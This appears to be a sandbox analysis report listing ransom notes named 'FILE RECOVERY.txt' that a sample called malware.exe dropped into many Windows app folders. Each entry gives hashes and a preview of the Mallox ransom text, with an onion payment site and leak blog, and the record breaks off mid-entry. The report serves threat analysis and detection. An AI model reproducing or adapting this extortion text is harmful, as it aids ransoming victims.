                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\LocalState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
